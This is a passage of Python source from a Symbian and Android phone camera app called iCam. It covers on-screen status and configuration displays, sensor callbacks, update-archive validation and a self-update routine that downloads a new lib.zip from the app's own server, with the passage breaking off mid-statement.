            #canvas.text((10, 30 + myDelta), u"Your device ID: %s." % deviceId,
            #    fill = (255, 255, 255))
            canvas.text((10, 30 + myDelta), myTextAPName, fill=(255, 255, 255))
            canvas.text((10, 45 + myDelta), myTextUpload, fill=(255, 255, 255))
            #canvas.text((10, 60 + myDelta), u" Pause interval: %d [sec]. " \
            #    "Burst detection %d." % (pauseInterval, motionDetectionIsOn),
            #    fill=(255, 255, 255))
            #canvas.text((10, 60 + myDelta), u"Pause: %d [sec]." % pauseInterval,
            #    fill=(255, 255, 255))
            canvas.text((10, 60 + myDelta), myTextPause, fill=(255, 255, 255))
            """
            if (cameraMode[0] != 0) and (cameraMode[1] == 0):
                myText = "Main"
            elif (cameraMode[0] != 0) and (cameraMode[1] != 0):
                myText = "Main & VGA"
            elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
                myText = "VGA"
            elif (cameraMode[0] == 0) and (cameraMode[1] == 0):
                myText = "None"
            canvas.text((10, 75 + myDelta), u"Cameras used: %s." % (myText),
                        fill = (0, 255, 0))
            """
            canvas.text((10, 75 + myDelta), u"Cameras used:", fill=(0, 255, 0))
            canvas.text((10, 90 + myDelta), u" %s" % myTextMainCam,
                        fill=(0, 255, 0))
            canvas.text((10, 105 + myDelta), u" %s" % myTextVGACam,
                        fill=(0, 255, 0))
            #canvas.text((10, 75 + myDelta), u"Rec [sec]: Cameras %d & %d, " \
            #    "Audio %d." % (videoRecordDuration[0],
            #    videoRecordDuration[1], audioRecordDuration),
            #    fill = (255, 255, 255))
            canvas.text((10, 120 + myDelta), myTextAudio, fill=(0, 255, 0))
            canvas.text((10, 135 + myDelta), myTextVer, fill=(255, 255, 255))
        except:
            DebugPrintErrorTrace()
    elif ANDROID_OS:
        # HTML_PATHFILENAME = "/sdcard/iCam/index.html"
        HTML_PATHFILENAME = LOCAL_FOLDER + "/index.html"
        #if not os.path.isfile(HTML_PATHFILENAME):
        try:
            fOutput = open(HTML_PATHFILENAME, "w")
            myText = myTextUpload
            myText += "<br/>"
            myText += myTextPause + "<br/>"
            myText += "Cameras used:<br/>\n"
            if numCamerasSupported > 0:
                myText += " " + myTextMainCam + "<br/>\n"
            myText += myTextAudio + "<br/>\n"
            myText += myTextVer + "<br/>\n"
            myText += myTextGoogle + "<br/>\n"
            # !!!!TODO: use """ ... """ instead - like this you don't need to specify \n, etc
            # The adjacent string literals below concatenate implicitly;
            # only str(myText) is joined with an explicit '+'.
            fOutput.write("<html>\n" \
                "<head>\n" \
                "<title>iCam</title>\n" \
                '<style type="text/css">\n' \
                "body {\n" \
                " background-color: #000000;\n" \
                "}\n" \
                "body,td,th {\n" \
                " color: #00FF00;\n" \
                "}\n" \
                ".style1 {font-size: xx-large}\n" \
                "</style></head>\n" \
                "<body>\n" \
                #'<span class="style1">Configure iCam & Start Broadcasting.</span><br/>\n' \
                '<span class="style1">Welcome to iCam!</span><br/>\n' \
                "<br/>\n" \
                #' (Press Menu, Start Broadcasting to start iCam)<br/>\n' + \
                "Configure & Start iCam!<br/><br/>\n" + \
                str(myText) + \
                "</body>\n" \
                "</html>\n"
                )
            fOutput.close()
            if not partialForAndroid:
                # wait=False - do NOT "block until the user exits the WebView
                myDroid.webViewShow(HTML_PATHFILENAME, False)
        except:
            DebugPrintErrorTrace()
    DebugPrint("Exiting DisplayRedrawInfo().")
#!!!!TODO: reuse code from DisplayRedrawInfo
def DisplayExtensiveInfo(displayMode=1, displayAllInfo=True):
    """Show a detailed status/configuration report.

    On Android this is just a note with the device ID and version.  On
    Symbian, displayMode selects the presentation: 0 renders into an
    appuifw.Text editor; 1 paints the full report on the canvas, and
    temporarily sets doNotDisplayRedrawInfo so the asynchronous
    RedrawHandler/DisplayRedrawInfo() does not draw over it.  With
    displayAllInfo, extra rows (photo settings, storage, GPS/Bluetooth,
    memory, GSM, battery) are added on Symbian^3.  Errors are logged
    and swallowed.
    """
    global doNotDisplayRedrawInfo
    global canvas
    if ANDROID_OS:
        DisplayNote(u"Your device ID (IMEI) is %s.\n iCam version: %s\n" % (deviceId, CURRENT_RELEASE_TIME))
    elif SYMBIAN_OS:
        # Refresh the cached myText* status strings before rendering.
        ComputeInfoStrings()
        if displayMode == 0:
            try:
                # From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/04._Basic_User_Interface#Text_Editor:
                myTextEditor = appuifw.Text()
                appuifw.app.body = myTextEditor
                # See http://pys60.garage.maemo.org/doc/s60/node21.html
                # It has only digit chars - letters are replaced by
                # "square" char.
                #myTextEditor.font = (u"Nokia Hindi S60", 12, None)
                myTextEditor.font = "dense"
                # NOTE(review): u"\n" % CURRENT_RELEASE_TIME raises
                # TypeError ("\n" has no conversion specifier), which the
                # except below silently swallows, cutting this view short.
                # Probably intended: myTextEditor.add(myTextVer + u"\n").
                myTextEditor.add(myTextVer + u"\n" % CURRENT_RELEASE_TIME)
                myTextEditor.add(u"Your device ID (IMEI) is %s." % deviceId)
                myTextEditor.add(u"\n")
                myTextEditor.add(u"Current configuration:")
                myTextEditor.add(u"\n")
                myTextEditor.add(u" " + myTextAPName)
                #myTextEditor.add(u"\n")
                """
                myText = u" Upload to: "
                if uploadMediaToYouTube:
                    myText += "YouTube "
                if uploadMediaToPicasa:
                    myText += "Picasa "
                if useiCamServer > 0:
                    myText += "iCam"
                myText += "."
                myTextEditor.add(myText)
                myTextEditor.add(u"")
                myTextEditor.add(u" Pause: %d [sec]." % (pauseInterval))
                myTextEditor.add(u"")
                myTextEditor.add(u" Rec [sec]: Cameras %d & %d, " \
                    "Microphone %d." \
                    % (videoRecordDuration[0],
                       videoRecordDuration[1],
                       audioRecordDuration))
                myTextEditor.add(u"")
                myTextEditor.add(u" Photo settings: local=%s, uploaded=%s, " \
                    "quality=%d." \
                    % (str(localPhotoResolution),
                       photoResolutionStr[photoResolutionIndex][0],
                       photoQuality))
                myTextEditor.add(u"")
                myTextEditor.add(u" localVideoMode = %s." % str(localVideoMode))
                myTextEditor.add(u"")
                if storeLocallyMedia == 0:
                    storeLocallyMediaStr = "no"
                elif storeLocallyMedia == 1:
                    storeLocallyMediaStr = "yes"
                else:
                    storeLocallyMediaStr = ":o"
                myTextEditor.add(u" Store locally: %s. Local folder=%s, " \
                    "media files=%s." \
                    % (storeLocallyMediaStr, LOCAL_FOLDER,
                       LOCAL_FOLDER_MEDIA_FILES))
                myTextEditor.add(u"")
                if readGPS:
                    myStr = "GPS in use."
                else:
                    myStr = "GPS not in use."
                myTextEditor.add(u" %s mode. %s" \
                    % (bluetoothModeList[bluetoothMode], myStr))
                myTextEditor.add(u"")
                myTextEditor.add(u" Free: RAM=%.2f; drives: C=%.2f, D=%.2f, "\
                    "E=%.2f [MB]." \
                    % (float(GetFreeRAM()) / MEGA_BYTE,
                       float(GetFreeDriveSpace("C:")) / MEGA_BYTE,
                       float(GetFreeDriveSpace("D:")) / MEGA_BYTE,
                       float(GetFreeDriveSpace("E:")) / MEGA_BYTE))
                myTextEditor.add(u"")
                myTextEditor.add(u" GSM: signal=%d[%s], CC=%d,NC=%d,LAC=%d," \
                    "CId=%d." \
                    % (signalStrength, signalUnits,
                       mobileCountryCode, mobileNetworkCode,
                       locationAreaCode, cellId))
                myTextEditor.add(u"")
                myTextEditor.add(u" Battery = %d%%, charger status = %d." \
                    % (GetBatteryLevelPercentage(), GetChargerStatus()))
                #myTextEditor.add()
                """
                return
            except:
                DebugPrintErrorTrace()
        # #####################################################################
        if displayMode == 1:
            # Suppress the asynchronous redraw while this report owns the
            # canvas; cleared again after the ao_sleep() near the end.
            doNotDisplayRedrawInfo = True
            DebugPrint("Entered DisplayExtensiveInfo().")
            if SYMBIAN_3:
                if appuifw.app.orientation == "portrait":
                    DebugPrint("DisplayExtensiveInfo(): getting out because " \
                               "appuifw.app.orientation == 'portrait'.")
                    """
                    Otherwise it seems it crashes if we do the following
                    operations (is it because it is printing out of
                    screen??) - see for ex
                    Z:\1PhD\ReVival\Logs\NokiaE7\2011_05_07\stdout_2011_05_07_15_37_43.txt.
                    """
                    return
            DebugPrint("DisplayExtensiveInfo(): here 0.")
            try:
                if SYMBIAN_3:
                    appuifw.app.body.begin_redraw()
                elif (S60_EDITION[0] >= 3) and \
                        (orientationForThisPhoneModel == "landscape"): # if not S60_EDITION == (3, 0):
                    try:
                        """
                        Yes, even N82 requires it.
                        Note: begin_redraw() and end_redraw() don't seem to
                        exist on PyS60 1.4.5
                        """
                        appuifw.app.body.begin_redraw()
                    except:
                        DebugPrintErrorTrace()
                ClearScreen()
                #Note: the visible canvas for normal display on S60 3rd is of
                # 320 x 210 pixels
                #canvas.text((10, 0), u"Welcome to iCam!", fill=(0, 255, 0))
                #canvas.text((10, 15), u"Configure iCam, then go to Options " \
                #    "and hit Start to run.", fill=(0, 255, 0))
                #canvas.text((10, 15), u"Configure iCam & Start Broadcasting.",
                #    fill=(0, 255, 0))
                #canvas.text((10, 15),
                #    u"Your device ID (IMEI) is %s." % deviceId,
                #    fill=(255, 255, 255))
                canvas.text((10, 15), u"Device ID: %s." % deviceId,
                            fill=(0, 255, 255))
                canvas.text((10, 30), u"Current configuration:",
                            fill=(255, 255, 255))
                DebugPrint("DisplayExtensiveInfo(): here 1.")
                canvas.text((10, 45), u" Access point used: %s."
                            % accessPointName, fill=(255, 255, 255))
                #canvas.text((10, 60), u" Upload to: YouTube=%d, Picasa=%d," \
                #    " iCam=%d." % (uploadMediaToYouTube, uploadMediaToPicasa,
                #    useiCamServer), fill=(255, 255, 255))
                myText = u" %s" % myTextUpload
                canvas.text((10, 60), myText, fill=(255, 255, 255))
                DebugPrint("DisplayExtensiveInfo(): here 2.")
                if motionDetectionIsOn == 0:
                    motionDetectionIsOnStr = "no"
                elif motionDetectionIsOn == 1:
                    motionDetectionIsOnStr = "yes"
                else:
                    # Unexpected value: show a visible placeholder.
                    motionDetectionIsOnStr = ":o"
                #canvas.text((10, 75), u" Pause interval: %d [sec]. " \
                #    "Burst detection: %d." % (pauseInterval,
                #    motionDetectionIsOn), fill=(255, 255, 255))
                """
                canvas.text((10, 75),
                    u" Pause interval: %d [sec]. " \
                    "Burst detection: %s. BATTERY_LEVEL_THRESHOLD: %d%%." % \
                    (pauseInterval, motionDetectionIsOnStr,
                     BATTERY_LEVEL_THRESHOLD),
                    fill=(255, 255, 255))
                """
                """
                canvas.text((10, 75),
                    u" Pause interval: %d [sec]. " \
                    "Motion detection: %s." % \
                    (pauseInterval, motionDetectionIsOnStr),
                    fill=(255, 255, 255))
                """
                canvas.text((10, 75),
                            u" Pause interval: %s. " \
                            "Motion detection: %s." % \
                            (GetTextPauseInterval(), \
                             motionDetectionIsOnStr),
                            fill=(255, 255, 255))
                #canvas.text((10, 75), u" Pause: %d [sec]." % (pauseInterval),
                #    fill=(255, 255, 255))
                """
                if (cameraMode[0] != 0) and (cameraMode[1] == 0):
                    myText = "Main"
                elif (cameraMode[0] != 0) and (cameraMode[1] != 0):
                    myText = "Main & VGA"
                elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
                    myText = "VGA"
                elif (cameraMode[0] == 0) and (cameraMode[1] == 0):
                    myText = "none"
                canvas.text((10, 90), u" Cameras used: %s." % (myText),
                            fill=(255, 255, 255))
                """
                myText = ""
                if numCamerasSupported > 0:
                    myText += myTextMainCam
                if numCamerasSupported >= 2:
                    myText += " " + myTextVGACam
                canvas.text((10, 90), u" Cameras used: %s." % myText,
                            fill=(255, 255, 255))
                DebugPrint("DisplayExtensiveInfo(): here 3.")
                canvas.text((10, 105),
                            u" Rec [sec]: Cameras %d & %d, Microphone %d."
                            % (videoRecordDuration[0],
                               videoRecordDuration[1], audioRecordDuration),
                            fill=(255, 255, 255))
                """
                Remember that Nokia 6680 has display of 176 (height?) x 208
                pixels, out of which we subtract ~40 pixels of the height.
                """
                # if SYMBIAN_3:
                if SYMBIAN_3:
                    if displayAllInfo:
                        DebugPrint("DisplayExtensiveInfo(): here 4.")
                        canvas.text((10,120), u" Photo settings: local=%s, " \
                                    "uploaded=%s, quality=%d."
                                    % (str(localPhotoResolution),
                                       photoResolutionStr[photoResolutionIndex][0],
                                       photoQuality), fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 5.")
                        if videoAudioEnabled == 1:
                            muteStr = "off"
                        else:
                            muteStr = "on"
                        canvas.text((10, 135),
                                    u" localVideoMode = %s; mute %s."
                                    % (str(localVideoMode), muteStr),
                                    fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 6.")
                        if storeLocallyMedia == 0:
                            storeLocallyMediaStr = "no"
                        elif storeLocallyMedia == 1:
                            storeLocallyMediaStr = "yes"
                        else:
                            storeLocallyMediaStr = ":o"
                        canvas.text((10, 150), u" Store locally: %s. " \
                                    "Local folder=%s, media files=%s." \
                                    % (storeLocallyMediaStr, LOCAL_FOLDER,
                                       LOCAL_FOLDER_MEDIA_FILES),
                                    fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 7.")
                        if readGPS:
                            myStr = "GPS in use."
                        else:
                            myStr = "GPS not in use."
                        #canvas.text((10, 165), u" Bluetooth mode = %d." \
                        #    % (bluetoothMode), fill=(255, 255, 255))
                        canvas.text((10, 165), u" %s (server is %s). %s"
                                    % (bluetoothModeList[bluetoothMode],
                                       bluetoothServerAddress, myStr),
                                    fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 8.")
                        """
                        if readGPS:
                            canvas.text((10, 180), u" GPS in use. ",
                                        fill=(255, 255, 255))
                        else:
                            canvas.text((10, 180), u" GPS not in use. ",
                                        fill=(255, 255, 255))
                        """
                        DebugPrint("DisplayExtensiveInfo(): here 9.")
                        canvas.text((10, 180), u" Free: RAM=%.2f; drives: " \
                                    "C=%.2f, D=%.2f, E=%.2f [MB]." \
                                    % (float(GetFreeRAM()) / MEGA_BYTE,
                                       float(GetFreeDriveSpace("C:")) / MEGA_BYTE,
                                       float(GetFreeDriveSpace("D:")) / MEGA_BYTE,
                                       float(GetFreeDriveSpace("E:")) / MEGA_BYTE),
                                    fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 10.")
                        # viewFinderSize
                        canvas.text((10, 195), u" GSM: signal=%d[%s], " \
                                    "CC=%d,NC=%d,LAC=%d,CId=%d."
                                    % (signalStrength, signalUnits,
                                       mobileCountryCode, mobileNetworkCode,
                                       locationAreaCode, cellId),
                                    fill=(255, 255, 255))
                        """
                        myStr = u" Battery = %d, charger status = %d." \
                            % (GetBatteryLevelPercentage(), GetChargerStatus())
                        DebugPrint("DisplayExtensiveInfo(): here 11 - " \
                            "myStr = %s" % str(myStr))
                        """
                        #canvas.text((10, 225), u" Battery=%.1f, " \
                        #    "charger status=%d." % (GetBatteryLevelPercentage(),
                        #    GetChargerStatus()), fill = (255, 255, 255))
                        canvas.text((10, 210),
                                    u" Battery: %d%%, charger status: %s. " \
                                    "Battery_Level_Threshold: %d%%." % \
                                    (GetBatteryLevelPercentage(), \
                                     GetChargerStatusStr(), \
                                     BATTERY_LEVEL_THRESHOLD), \
                                    fill=(255, 255, 255))
                        DebugPrint("DisplayExtensiveInfo(): here 12.")
                if SYMBIAN_3:
                    appuifw.app.body.end_redraw()
                elif (S60_EDITION[0] >= 3) and \
                        (orientationForThisPhoneModel == "landscape"): # if not S60_EDITION == (3, 0):
                    try:
                        """
                        Yes, even N82 requires it. Note: begin_redraw() and
                        end_redraw() don't seem to exist on PyS60 1.4.5.
                        """
                        appuifw.app.body.end_redraw()
                    except:
                        DebugPrintErrorTrace()
                """
                On N82 - see stdout_2011_05_18_10_19_26.txt:
                    Exiting DisplayExtensiveInfo().
                    Entered RedrawHandler(): rect = (0, 0, 320, 198)
                    Entered DisplayRedrawInfo().
                """
                # SleepAndPetWatchdog(3.0)
                """
                IMPORTANT: Do not use SleepAndPetWatchdog because it can
                mess up (basically it seems it cancels the timer and it
                doesn't continue) the already issued
                SleepAndPetWatchdog() from ReactiveLoop (this function,
                DisplayExtensiveInfo() is called asynchronously).
                """
                # We sleep because we want to force RedrawHandler() to be
                # issued, while doNotDisplayRedrawInfo = True.
                e32.ao_sleep(2.0)
                doNotDisplayRedrawInfo = False
                """
                SOCKET_DEFAULT_TIMEOUT, uploadUnsentData,
                uploadHowManyOfLatestBluetoothMessages
                battery = %d. charger_status = %d
                signalStrength
                free_ram, drive
                # From GetTextForState(cameraId):
                resText = "Free space in bytes on drive C = %d, " \
                    "on drive E = %d. " % (GetFreeDriveSpace("C:"),
                    GetFreeDriveSpace("E:"))
                resText += "free_ram = %d. GSM network signal " \
                    "strength = %d [%s]. Battery = %d, " \
                    "charger_status = %d. Pause interval " \
                    "(pauseInterval) = %d. " \
                    % (GetFreeRAM(), signalStrength, signalUnits,
                       GetBatteryLevelPercentage(),
                       GetChargerStatus(), pauseInterval)
                resText += "Resolution (photoResolutionIndex) = %d. " \
                    "photoModeIndex = %d. digitalZoom = %d. " \
                    "photoQuality = %d. exposureIndex[0] = %d. " \
                    % (photoResolutionIndex, photoModeIndex[cameraId],
                       digitalZoom, photoQuality, exposureIndex[0])
                resText += "whiteBalanceIndex[0] = %d. exposureIndex[1] = %d."\
                    " whiteBalanceIndex[1] = %d. flashIndex = %d. " \
                    "audioRecordDuration = %d. " \
                    % (whiteBalanceIndex[0], exposureIndex[1],
                       whiteBalanceIndex[1], flashIndex,
                       audioRecordDuration)
                resText += "rotateDegreesImage = %d. mobileCountryCode = %d. "\
                    "mobileNetworkCode = %d. locationAreaCode = %d. " \
                    "cellId = %d." % (rotateDegreesImage,
                    mobileCountryCode, mobileNetworkCode,
                    locationAreaCode, cellId)
                """
            except:
                DebugPrintErrorTrace()
            DebugPrint("Exiting DisplayExtensiveInfo().")
if SYMBIAN_OS:
    # Sample counter shared by the accelerometer callback below.
    counter = 0

    def AccSensorCallback(sensorData):
        """Accelerometer-sensor callback.

        Counts incoming samples and logs only every 35th one, so the
        high sample rate does not flood the debug log.
        """
        global counter
        counter += 1
        if counter % 35 == 0:
            DebugPrint("AccSensor: %s" % str(sensorData))

    def RotSensorCallback(sensorData):
        """Rotation-sensor callback: log every sample."""
        DebugPrint("RotSensor: %s" % str(sensorData))
# zipfile may be missing on some (older) phone Python runtimes; remember
# whether the import worked so archive validation can be skipped
# gracefully (see CheckZipFile()/ApplyUpdate()).
try:
    import zipfile
    zipfileImported = True
except:
    zipfileImported = False
    DebugPrint("Not able to import the zipfile module.")
    DebugPrintErrorTrace()
def CheckZipFile(pathFileName):
    """Validate a downloaded iCam update archive.

    pathFileName is assumed to exist.  The archive is accepted only if:
      - it is a well-formed ZIP file,
      - it contains every required file (currently just "a.pyc"),
      - its manifest.txt (when present) records a release time strictly
        newer than CURRENT_RELEASE_TIME.

    Returns 0 when the archive looks like a valid, newer update, and -1
    otherwise; unexpected exceptions are logged and also yield -1.
    """
    try:
        if not zipfile.is_zipfile(pathFileName):
            myText = "CheckZipFile(): %s is NOT a valid zip file." % \
                     pathFileName
            DebugPrint(myText)
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                                  WEBPAGE_UL_GZIPPED_TEXT, None)
            return -1
        # Open the zipped file.
        myZipFile = zipfile.ZipFile(pathFileName, "r")
        try:
            if MY_DEBUG_STDOUT:
                # (The original Python-2 "print" statement is replaced by
                # an explicit write with identical output, so the function
                # parses under both Python 2 and 3.)
                sys.stdout.write("CheckZipFile(): The contents of the "
                                 "update ZIP file are:\n")
                myZipFile.printdir()
                sys.stdout.flush()
            # Files that MUST be present in a valid update archive.
            checkFilenameList = ["a.pyc"]
            # Enumerate the archived files: tick off the required ones and
            # inspect manifest.txt when we meet it.
            for myZipInfo in myZipFile.infolist():
                fileName = myZipInfo.filename
                # BUGFIX: the original popped by index while iterating a
                # stale range(len(...)), which raises IndexError once an
                # element has been removed (the outer except silently
                # turned that into a spurious -1).  remove() is safe.
                if fileName in checkFilenameList:
                    checkFilenameList.remove(fileName)
                if fileName == "manifest.txt":
                    # Decompress the manifest and compare its recorded
                    # release time with the running version's.
                    manifestData = myZipFile.read(fileName)
                    DebugPrint(("The contents of %s are:\n" % fileName) +
                               manifestData)
                    lineList = manifestData.splitlines()
                    # Just in case the line carries stray whitespace.
                    lineList[0] = lineList[0].rstrip(" \r\n")
                    tokens = lineList[0].split(": ")
                    updateReleaseTime = tokens[1]
                    if updateReleaseTime <= CURRENT_RELEASE_TIME:
                        myText = "CheckZipFile(): The installed version of iCam " \
                                 "seems to be the most recent one: " \
                                 "updateReleaseTime = %s, " \
                                 "CURRENT_RELEASE_TIME = %s." % \
                                 (updateReleaseTime, CURRENT_RELEASE_TIME)
                        DebugPrint(myText)
                        if MY_DEBUG_UPLOAD_MSG:
                            UploadGZippedData(deviceId, myText,
                                              ICAM_SERVER_NAME,
                                              WEBPAGE_UL_GZIPPED_TEXT, None)
                        return -1
            if checkFilenameList != []:
                DebugPrint("CheckZipFile(): The update ZIP file does not " \
                           "contain the following indicated files: %s" % \
                           str(checkFilenameList))
                return -1
            return 0
        finally:
            # BUGFIX: the original never closed the archive (handle leak).
            myZipFile.close()
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = \
            sys.exc_info()
        myText = "Exception in CheckZipFile(). Details: time = %s, " \
                 "free_ram = %d. %s." % \
                 (GetCurrentDateTimeStringNice(), GetFreeRAM(),
                  repr(traceback.format_tb(exceptionTraceback)))
        DebugPrint(myText)
        #if MY_DEBUG_STDERR:
        #    sys.stderr.write(myText + "\n")
        DebugPrintErrorTrace()
        return -1
def ApplyUpdate(UPDATE_PATH_FILENAME, TARGET_UPDATE_PATH_FILENAME,
                TARGET_UPDATE_PATH_FILENAME_BACKUP):
    """Install an update archive in place of the current one.

    The current TARGET_UPDATE_PATH_FILENAME is first moved aside to
    TARGET_UPDATE_PATH_FILENAME_BACKUP (a stale backup, if any, is
    deleted), then UPDATE_PATH_FILENAME is moved over it and the user is
    told to restart the app.  All steps are best-effort: failures are
    logged via DebugPrintErrorTrace(), never raised.
    """
    # When the zipfile module is available, refuse archives that fail
    # validation; without zipfile the update is applied unchecked.
    if zipfileImported and CheckZipFile(UPDATE_PATH_FILENAME) != 0:
        return
    try:
        # Drop any stale backup so the move below cannot collide with it.
        if os.path.isfile(TARGET_UPDATE_PATH_FILENAME_BACKUP):
            os.unlink(TARGET_UPDATE_PATH_FILENAME_BACKUP)
    except:
        DebugPrintErrorTrace()
    try:
        MoveFileBetweenAnyDrives(TARGET_UPDATE_PATH_FILENAME,
                                 TARGET_UPDATE_PATH_FILENAME_BACKUP)
        MoveFileBetweenAnyDrives(UPDATE_PATH_FILENAME,
                                 TARGET_UPDATE_PATH_FILENAME)
        myText = "Found update %s. Copied it. Restart app to run updated " \
                 "version." % UPDATE_PATH_FILENAME
        DebugPrint(myText)
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                              WEBPAGE_UL_GZIPPED_TEXT, None)
        appuifw.note(unicode(myText), "info")
    except:
        DebugPrintErrorTrace()
def AutoUpdate_real():
    """
    os.getcwd() returns the place where lib.zip is
    installed - e.g., "E:\Private\e21e55ef".

    Self-update worker.  On Symbian S60 (PyS60 1.9+ only) it:
      1. backs up default.py and lib.zip under LOCAL_FOLDER/Backup;
      2. applies an update found in LOCAL_FOLDER/Update/FromLocal, if any
         (checking both lower- and upper-case file names), and stops;
      3. otherwise, unless accessPointRetryConnect is set, asks the iCam
         server for the latest release time and, when it is newer than
         CURRENT_RELEASE_TIME, downloads lib.zip and applies it via
         ApplyUpdate().
    A no-op on Android and PythonCE.  All errors are logged and swallowed.
    """
    DebugPrint("Entered AutoUpdate(): os.getcwd() = %s." % os.getcwd())
    try:
        PetWatchdog()
        if ANDROID_OS:
            pass
        elif SYMBIAN_S60_OS:
            # elif SYMBIAN_OS:
            """
            We do not support yet update for iCam for PyS60 1.4.x
            (i.e., S60 2nd edition)
            !!!!TODO: copy automatically the a.pyc to the iCam app folder.
            """
            if _PyS60_1_9_OR_NEWER == False:
                return
            # We update iCam for PyS60 1.4.x (S60 3rd+ edition)
            LOCAL_FOLDER_BACKUP = LOCAL_FOLDER + "/Backup"
            if not os.path.exists(LOCAL_FOLDER_BACKUP):
                os.makedirs(LOCAL_FOLDER_BACKUP)
            LOCAL_FOLDER_UPDATE_FROM_INTERNET = LOCAL_FOLDER + "/Update"
            if not os.path.exists(LOCAL_FOLDER_UPDATE_FROM_INTERNET):
                os.makedirs(LOCAL_FOLDER_UPDATE_FROM_INTERNET)
            LOCAL_FOLDER_UPDATE_FROM_INTERNET = LOCAL_FOLDER \
                + "/Update/FromInternet"
            if not os.path.exists(LOCAL_FOLDER_UPDATE_FROM_INTERNET):
                os.makedirs(LOCAL_FOLDER_UPDATE_FROM_INTERNET)
            UPDATE_FILENAME = "lib.zip"
            UPDATE_FROM_INTERNET_PATH_FILENAME = \
                LOCAL_FOLDER_UPDATE_FROM_INTERNET + "/" + \
                UPDATE_FILENAME
            # TARGET_UPDATE_PATH_FILENAME = "E:/private/e21e55ef/lib.zip"
            TARGET_UPDATE_PATH_FILENAME = os.getcwd() + "\\lib.zip"
            TARGET_UPDATE_PATH_FILENAME_BACKUP = \
                TARGET_UPDATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
            # STEP 1: Make a copy of file default.py to LOCAL_FOLDER.
            if S60_EDITION[0] >= 3:
                PYTHON_SCRIPT_PATH_FILENAME = "./default.py"
            else:
                PYTHON_SCRIPT_PATH_FILENAME = "./default.py"
            # CopyFile(PYTHON_SCRIPT_PATH_FILENAME, E:/iCam_default_copy.py")
            # CopyFile(PYTHON_SCRIPT_PATH_FILENAME,
            #          LOCAL_FOLDER + "/iCam_default_copy.py")
            CopyFile(PYTHON_SCRIPT_PATH_FILENAME, LOCAL_FOLDER_BACKUP + \
                     "/iCam_default_copy.py")
            # STEP 2: Make a copy of file lib.zip to LOCAL_FOLDER.
            if S60_EDITION[0] >= 3:
                PYTHON_SCRIPT_PATH_FILENAME = "./lib.zip"
            else:
                PYTHON_SCRIPT_PATH_FILENAME = "./lib.zip"
            # PYTHON_SCRIPT_PATH_FILENAME_COPY = "E:/lib_copy.zip"
            PYTHON_SCRIPT_PATH_FILENAME_COPY = LOCAL_FOLDER_BACKUP + \
                "/lib_copy.zip"
            # Only back up lib.zip once; never overwrite an older backup.
            if not os.path.isfile(PYTHON_SCRIPT_PATH_FILENAME_COPY):
                CopyFile(PYTHON_SCRIPT_PATH_FILENAME,
                         PYTHON_SCRIPT_PATH_FILENAME_COPY)
            # STEP 3: Update from Memory card, if there is such update at
            # UPDATE_FROM_DISK_PATH_FILENAME (see below).
            UPDATE_FROM_DISK_PATH_FILENAME = LOCAL_FOLDER + \
                "/Update/FromLocal/" + UPDATE_FILENAME
            if os.path.isfile(UPDATE_FROM_DISK_PATH_FILENAME):
                ApplyUpdate(UPDATE_FROM_DISK_PATH_FILENAME,
                            TARGET_UPDATE_PATH_FILENAME,
                            TARGET_UPDATE_PATH_FILENAME_BACKUP)
                # We tried updating and don't continue any other update.
                return
            # At least for Symbian we check for uppercase of UPDATE_FILENAME,
            # as well. Note: even if on Win the file on memory card looks
            # lowercase on Symbian it might be uppercase :)
            UPDATE_FROM_DISK_PATH_FILENAME = LOCAL_FOLDER + \
                "/Update/FromLocal/" + str.upper(UPDATE_FILENAME)
            if os.path.isfile(UPDATE_FROM_DISK_PATH_FILENAME):
                ApplyUpdate(UPDATE_FROM_DISK_PATH_FILENAME,
                            TARGET_UPDATE_PATH_FILENAME,
                            TARGET_UPDATE_PATH_FILENAME_BACKUP)
                # We tried updating and don't continue any other update.
                return
            # STEP 4: Update from the Internet, if a newer Release version is
            # available.
            if not accessPointRetryConnect:
                try:
                    # Look for Python runtime for Symbian, Android, etc!!!!
                    updateReleaseTime = urllib.urlopen("http://" +
                        ICAM_SERVER_NAME + WEB_FOLDER +
                        "/GetLatestVersion.php").read()
                    # The N95 unit expects builds tagged with its own IMEI.
                    if (deviceId == IMEI_N95) and \
                            (updateReleaseTime.find(IMEI_N95) == -1):
                        DebugPrint("AutoUpdate(): phone with deviceId = %s " \
                                   "expects update with updateReleaseTime " \
                                   "containing its deviceId (i.e., built " \
                                   "for it as well). Since this is not the " \
                                   "case - updateReleaseTime = %s - we bail" \
                                   " out." % (deviceId, updateReleaseTime))
                        return
                    #dataUncompressed = dataCompressed.decode("zlib")
                    # We might have updateReleaseTime ==
                    # "2011_05_07_09_00_00_N95N95N95N95N95" and we want only
                    # to look at the date.
                    if updateReleaseTime[:len(CURRENT_RELEASE_TIME)] <= \
                            CURRENT_RELEASE_TIME:
                        myText = "AutoUpdate(): The installed version of " \
                                 "iCam seems to be the most recent one: " \
                                 "updateReleaseTime = %s, " \
                                 "CURRENT_RELEASE_TIME = %s." % \
                                 (updateReleaseTime, CURRENT_RELEASE_TIME)
                        if MY_DEBUG_UPLOAD_MSG:
                            UploadGZippedData(deviceId, myText,
                                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
                        DebugPrint(myText)
                        return
                    else:
                        myText = "AutoUpdate(): The installed version of " \
                                 "iCam is out-of-date, so we update: " \
                                 "updateReleaseTime = %s, " \
                                 "CURRENT_RELEASE_TIME = %s." % \
                                 (updateReleaseTime, CURRENT_RELEASE_TIME)
                        if MY_DEBUG_UPLOAD_MSG:
                            UploadGZippedData(deviceId, myText,
                                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
                        DebugPrint(myText)
                        dataUpdate = urllib.urlopen("http://" +
                            ICAM_SERVER_NAME + WEB_FOLDER + "/Files/" +
                            UPDATE_FILENAME).read()
                except:
                    dataUpdate = ""
                    (exceptionType, exceptionValue, exceptionTraceback) = \
